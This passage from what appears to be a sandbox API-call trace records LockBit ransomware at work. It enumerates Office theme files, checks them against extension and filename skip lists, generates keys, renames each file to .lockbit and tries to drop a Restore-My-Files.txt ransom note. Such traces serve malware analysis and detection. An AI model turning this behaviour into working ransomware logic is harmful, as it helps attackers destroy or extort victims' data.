param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Opulent.thmx.lockbit") returned 74 [0190.305] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Opulent.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\opulent.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0190.322] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0190.322] malloc (_Size=0x40068) returned 0x1ff1e60 [0190.322] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=78521) returned 1 [0190.322] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.322] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.323] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0190.323] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.323] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.323] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0190.323] ReadFile (in: hFile=0x330, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0190.330] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Opulent.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Opulent.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.330] malloc (_Size=0xaa) returned 0x1fa2ed8 [0190.330] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xaa, FileInformationClass=0xa) returned 0x0 [0190.331] free (_Block=0x1fa2ed8) [0190.332] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Opulent.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0190.332] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0190.332] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0190.332] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x229a5400, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5bca8c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x229a5400, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x16ef4, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oriel.thmx", cAlternateFileName="ORIEL~1.THM")) returned 1 [0190.332] lstrcmpiW (lpString1=".", lpString2="Oriel.thmx") returned -1 [0190.332] lstrcmpiW (lpString1="..", lpString2="Oriel.thmx") returned -1 [0190.332] PathFindExtensionW (pszPath="Oriel.thmx") returned=".thmx" [0190.332] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0190.332] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0190.332] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0190.332] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0190.332] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0190.332] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0190.332] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0190.332] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0190.332] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0190.332] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0190.332] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0190.333] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0190.333] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0190.333] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0190.333] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0190.333] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0190.333] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0190.333] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0190.333] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0190.333] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0190.333] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0190.333] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0190.333] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0190.333] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0190.333] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.333] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0190.333] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0190.333] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0190.333] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0190.333] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0190.333] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0190.333] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0190.334] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0190.334] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0190.334] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0190.334] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0190.334] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0190.334] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0190.334] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0190.334] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0190.334] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0190.334] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0190.334] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.334] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0190.334] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0190.334] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0190.334] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0190.334] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Oriel.thmx") returned 1 [0190.334] lstrcmpiW (lpString1="ntldr", lpString2="Oriel.thmx") returned -1 [0190.334] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Oriel.thmx") returned -1 [0190.334] lstrcmpiW (lpString1="bootsect.bak", lpString2="Oriel.thmx") returned -1 [0190.334] lstrcmpiW (lpString1="autorun.inf", lpString2="Oriel.thmx") returned -1 [0190.334] lstrcmpiW (lpString1="thumbs.db", lpString2="Oriel.thmx") returned 1 [0190.335] lstrcmpiW (lpString1="iconcache.db", lpString2="Oriel.thmx") returned -1 [0190.335] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0190.335] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Oriel.thmx") returned=".thmx" [0190.335] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0190.335] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0190.335] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0190.335] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0190.335] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0190.335] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0190.335] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0190.335] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0190.335] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0190.335] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0190.335] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0190.335] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0190.335] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0190.335] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0190.335] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0190.335] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0190.335] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0190.335] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0190.335] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0190.335] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0190.336] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0190.336] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0190.336] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0190.336] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0190.336] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0190.336] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0190.336] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0190.336] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0190.336] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Oriel.thmx.lockbit") returned 72 [0190.336] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Oriel.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\oriel.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0190.343] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0190.343] malloc (_Size=0x40068) returned 0x3df0008 [0190.343] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=93940) returned 1 [0190.343] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.344] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0190.344] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.344] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0190.344] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0190.347] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Oriel.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Oriel.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.347] malloc (_Size=0xa6) returned 0x1fa2ed8 [0190.347] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0190.349] free (_Block=0x1fa2ed8) [0190.349] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Oriel.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0190.349] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0190.349] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0190.349] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x262ddb00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5bca8c0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x262ddb00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x1540b, dwReserved0=0x0, dwReserved1=0x0, cFileName="Origin.thmx", cAlternateFileName="ORIGIN~1.THM")) returned 1 [0190.349] lstrcmpiW (lpString1=".", lpString2="Origin.thmx") returned -1 [0190.349] lstrcmpiW (lpString1="..", lpString2="Origin.thmx") returned -1 [0190.349] PathFindExtensionW (pszPath="Origin.thmx") returned=".thmx" [0190.350] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0190.350] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0190.350] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0190.350] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0190.350] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0190.350] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0190.350] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0190.350] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0190.350] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0190.350] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0190.350] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0190.350] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0190.350] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0190.350] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0190.350] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0190.350] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0190.350] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0190.350] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0190.350] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0190.351] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0190.351] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0190.351] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0190.351] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0190.351] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0190.351] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.351] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0190.351] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0190.351] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0190.351] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0190.351] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0190.351] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0190.351] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0190.351] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0190.351] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0190.351] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0190.351] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0190.351] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0190.351] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0190.351] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0190.351] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0190.351] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0190.352] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0190.352] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.352] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0190.352] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0190.352] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0190.352] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0190.352] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Origin.thmx") returned 1 [0190.352] lstrcmpiW (lpString1="ntldr", lpString2="Origin.thmx") returned -1 [0190.352] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Origin.thmx") returned -1 [0190.352] lstrcmpiW (lpString1="bootsect.bak", lpString2="Origin.thmx") returned -1 [0190.352] lstrcmpiW (lpString1="autorun.inf", lpString2="Origin.thmx") returned -1 [0190.352] lstrcmpiW (lpString1="thumbs.db", lpString2="Origin.thmx") returned 1 [0190.352] lstrcmpiW (lpString1="iconcache.db", lpString2="Origin.thmx") returned -1 [0190.352] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0190.352] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Origin.thmx") returned=".thmx" [0190.352] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0190.352] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0190.352] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0190.352] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0190.352] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0190.352] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0190.352] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0190.352] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0190.352] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0190.353] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0190.353] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0190.353] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0190.353] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0190.353] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0190.353] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0190.353] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0190.353] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0190.353] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0190.353] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0190.353] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0190.353] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0190.353] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0190.353] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0190.353] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0190.353] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0190.353] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0190.353] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0190.353] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0190.353] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Origin.thmx.lockbit") returned 73 [0190.353] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Origin.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\origin.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0190.361] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0190.361] malloc (_Size=0x40068) returned 0x3df0008 [0190.361] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=87051) returned 1 [0190.361] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.362] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.362] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0190.362] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0190.362] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0190.362] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0190.362] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0190.364] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Origin.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Origin.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0190.365] malloc (_Size=0xa8) returned 0x1fa2ed8 [0190.365] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xa8, FileInformationClass=0xa) returned 0x0 [0190.366] free (_Block=0x1fa2ed8) [0190.366] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Origin.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0190.366] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0190.366] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0190.366] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29c16200, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5c16b80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x29c16200, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x421e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Paper.thmx", cAlternateFileName="PAPER~1.THM")) returned 1 [0190.366] lstrcmpiW (lpString1=".", lpString2="Paper.thmx") returned -1 [0190.366] lstrcmpiW (lpString1="..", lpString2="Paper.thmx") returned -1 [0190.366] PathFindExtensionW (pszPath="Paper.thmx") returned=".thmx" [0190.366] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0190.366] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0190.366] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0190.367] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0190.367] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0190.367] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0190.367] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0190.367] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0190.367] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0190.367] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0190.367] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0190.367] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0190.367] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0190.367] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0190.367] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0190.367] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0190.367] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0190.367] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0190.367] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0190.367] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0190.367] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0190.367] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0190.367] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0190.367] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0190.367] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0190.367] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0190.368] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0190.368] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0190.368] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0190.368] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0190.368] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0190.368] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0190.368] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0190.368] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0190.368] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0190.368] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0190.368] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0190.368] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0190.368] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0190.368] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0190.368] lstrcmpiW 